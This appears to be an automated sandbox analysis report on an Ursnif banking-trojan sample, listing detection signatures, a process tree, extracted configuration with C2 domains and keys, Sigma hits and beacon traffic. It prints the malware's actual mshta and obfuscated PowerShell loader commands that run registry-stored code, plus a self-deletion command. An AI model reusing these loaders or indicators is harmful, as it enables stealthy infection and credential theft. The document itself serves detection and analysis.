Loading ...

Play interactive tourEdit tour

Windows Analysis Report lia.exe

Overview

General Information

Sample Name:lia.exe
Analysis ID:551720
MD5:8b893e03dd1c7ce96df57f92f302dcb1
SHA1:a7a131ea9f39ebaa195296ebd9b44708bee8264d
SHA256:dd023f1f2ce682e9db588aa6cb859b6279d5e43f87a9a99da3cd683711736324
Tags:exegozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • lia.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\lia.exe" MD5: 8B893E03DD1C7CE96DF57F92F302DCB1)
    • control.exe (PID: 6004 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6168 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6428 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 3092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6404 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5868 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 4252 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5772 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4572 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 5160 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5652 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 5360 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 988 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7160 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6256 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • backgroundTaskHost.exe (PID: 6256 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
    00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
      00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
          00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            Click to see the 71 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.3.lia.exe.3008f40.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              1.3.lia.exe.2f5a4a0.0.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                1.3.lia.exe.2f5a4a0.0.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  1.3.lia.exe.2fd94a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
                    Sigma detected: Suspicious Rundll32 ActivityShow sources
                    Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6004, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 5360
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, ProcessId: 7160
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132864962767392163.6652.DefaultAppDomain.powershell

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/FcAvira URL Cloud: Label: malware
                    Source: http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/IAvira URL Cloud: Label: malware
                    Found malware configurationShow sources
                    Source: lia.exeMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: lia.exeVirustotal: Detection: 64%Perma Link
                    Source: lia.exeReversingLabs: Detection: 74%
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: lia.exeAvira: detected
                    Machine Learning detection for sampleShow sources
                    Source: lia.exeJoe Sandbox ML: detected
                    Source: 1.2.lia.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 1.0.lia.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: C:\Users\user\Desktop\lia.exeCode function: 1_2_00B17479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_00B17479
                    Source: lia.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp
                    Source: C:\Users\user\Desktop\lia.exeCode function: 1_2_039E8409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_039E8409
                    Source: C:\Users\user\Desktop\lia.exeCode function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_039F2ECF
                    Source: C:\Users\user\Desktop\lia.exeCode function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_039EB9D4
                    Source: C:\Users\user\Desktop\lia.exeCode function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_039DE91D
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,44_2_036BE91D
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,44_2_036CB9D4
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,44_2_036D2ECF

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49768 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 185.189.12.123:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\explorer.exeDomain query: io.immontyr.com
                    Uses nslookup.exe to query domainsShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    May check the online IP address of the machineShow sources
                    Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                    Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                    Uses ping.exe to check the status of other devices and networksShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                    Source: global trafficHTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
